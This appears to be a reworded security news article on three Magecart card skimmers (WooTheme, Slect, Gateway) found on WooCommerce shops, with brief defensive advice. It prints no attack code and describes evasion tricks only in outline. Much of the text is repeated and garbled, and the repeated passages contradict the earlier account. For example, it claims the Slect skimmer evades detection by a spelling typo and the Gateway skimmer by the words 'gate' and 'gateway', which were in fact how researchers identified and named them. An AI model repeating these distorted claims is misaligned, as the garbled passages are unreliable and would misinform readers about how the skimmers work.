The Christmas shopping season is approached, and so are the Magecart assailants. Surprisingly, these assailants have been more aggressive than ever before, with an attack every 16 minutes.
The Magecart attackers have recently targeted merchants which use the WooCommerce WordPress plugin. This open-source WordPress plugin is easy to customize and accounts for 29% of the top one million websites that use e-commerce technology. Because to its growing popularity, the plugin is now vulnerable to Magecart.
Actual Story
- Three additional skimmers targeting merchants utilizing the WooCommerce plugin have been discovered by RiskIQ researchers.
- WooTheme, Slect, and Gateway skimmers were designed to evade detection and allow attackers to steal customers’ banking information.
- In order to launch the skimming codes on the sites, hackers exploited vulnerabilities in third-party themes and tools integrated into WooCommerce pages.
More Information about the Skimmer
Magecart is a cyberattack that involves the stealing of digital credit cards by introducing malicious code into e-commerce sites and skimming payment forms online. This method of attack rose to notoriety when it was used against the e-commerce platform Magento.
The various skimming gangs operating throughout the world, on the other hand, target practically every web environment and payment platform, including dozens of additional online shopping platforms, particularly popular free and low-cost ones. WooCommerce is one of these plugins.
In late 2021, Magecart focused on WooCommerce, an open-source WordPress plugin that is extensively used by online shops. Researchers from RiskIQ discovered three distinct skimmer kinds in WooCommerce checkout pages.
The WooTheme Skimmer
The first Magecart skimmer was discovered by RiskIQ across five domains utilising a hacked WooCommerce theme. The WooTheme skimmer is a rather simple skimmer that makes its functions relatively straightforward to grasp.
With the exception of one iteration, operators disguised the skimming code. However, RiskIQ discovered the obfuscated skimmer on the same hacked domain before the clear text version surfaced, indicating that this is an error.
This same skimmer was identified in July 2021 by researcher unmaskparasites, who noted comparable findings of an exfil domain within the theme’s function.php and the same destination within the query.slim.js file.
The Slect Skimmer
Generic skimmers are in high demand and are relatively easy to get by.
They’re utilised frequently over the same infrastructure, even by various threat actors who customise the skimmer to meet their own requirements.
Detecting slight changes in skimmers, on the other hand, aids us in determining the patterns that indicate whether Magecart activity is new.
The ‘Slect’ skimmer was named after what appears to be a spelling typo of the word “select” in the script, which gave it away as a never-before-seen skimmer.
The Slect skimmer does two fascinating things once the DOM material is fully loaded.
It will seek for open text fields, passwords, and checkboxes, as well as other form fields that the skimmer does not wish to grab data from.
Then, to avoid sandboxing by security researchers, an event listener listens for a button click.
To avoid detection on infected sites, the Slect skimmer exploits a spelling typo in the script’s word’select.’
The skimmer’s exfil domain has already been linked to other Magecart infrastructure, and RiskIQ researcher Jordan Herman recognised it as being utilised by a Grelos skimmer variation.
The Gateway Skimmer
The actor had piled this last skimmer high with several layers and stages to disguise and obfuscate processes.
While obfuscated, the skimmer code is huge and difficult to decipher, and it performs a few operations that aren’t found in other skimmers.
The words “gate” and “gateway” in the.php and.js files let us identify this skimmer as unique and give it the name “Gateway.”
The WooTheme skimmer code was identified in five domains utilising a hacked WooCommerce theme, which was first reported in July.
The skimmer code appeared to be in the hacked domain’s ‘error’ area on one website.
To avoid detection on infected sites, the Slect skimmer exploits a spelling typo in the script’s word ‘select.’
Once the malicious code has been injected, it searches for open text fields, passwords, and checkboxes on the form.
Multiple layers of obfuscation methods are used in the Gateway skimmer, making it difficult to detect by security researchers.
To avoid detection, it employs the words ‘gate’ and ‘gateway’ in PHP and JavaScript scripts.
According to experts, the Gateway skimmer’s WooCommerce checks for a Firebug web browser extension that was decommissioned in 2017.
RiskIQ researchers discovered a skimmer we’ve been monitoring since 2019 after peeling back the obfuscation throughout the legitimate code in this skimmer.
This skimmer also sends PII and credit card information to the same c2 domain as the previous skimmer.
This WooCommerce version of the Gateway skimmer checks for a Firebug web browser extension, which is interesting (long since discontinued in 2017).
How can you protect your company?
New skimmers have been discovered, demonstrating how threat actors are inventing new ways to obtain access to, deploy, and hide their tools on victim websites. As a result, merchants must improve their preparedness for credit card skimming attacks. Aside from that, having effective malware detection mechanisms and periodically examining crontab instructions for unusual contents might help to limit the danger of such assaults.
RiskIQ’s identification of credit card skimmers and Magecart activity is still evolving, and the company’s knowledge base on these types of assaults is growing. An surge in e-commerce targeting puts merchants and online shoppers at risk, especially during the holiday season.
Small and medium-sized enterprises, which are frequently regarded the most vulnerable, are frequent WooCommerce users, as they lack the means to invest in complex and thoroughly verified third-party technologies. Magecart skimming can affect both small and large retailers, as we’ve witnessed over the years.
Threat actors acquire access to, deploy, and hide their tools on victim websites in a variety of methods, according to RiskIQ’s detections of skimmers and other malware. Aside from having comprehensive malware detection, website operations should check their crontab commands for weird contents on a regular basis, ensuring that access permissions are correct, and audit file access to it.
